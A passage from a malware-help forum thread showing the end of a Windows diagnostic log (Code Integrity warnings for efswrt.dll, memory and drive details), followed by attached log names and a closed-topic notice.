found on the system. Date: 2016-03-16 15:42:58.774 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-10 18:25:28.930 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-10 12:06:06.024 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-02 18:14:41.587 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-01 15:48:48.930 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: AMD A8-7410 APU with AMD Radeon R5 Graphics Percentage of memory in use: 85% Total physical RAM: 3529.01 MB Available physical RAM: 503.86 MB Total Virtual: 4481.13 MB Available Virtual: 1414.03 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:910.68 GB) (Free:853.86 GB) NTFS Drive d: (RECOVERY) (Fixed) (Total:19.64 GB) (Free:2.24 GB) NTFS ==>[system with boot components (obtained from drive)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 07FA63C3) Partition: GPT. ==================== End of Addition.txt ============================

4 - 2 Log.txt

Malwarebytes log.txt

Link to post
Share on other sites

  • 2 months later...
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.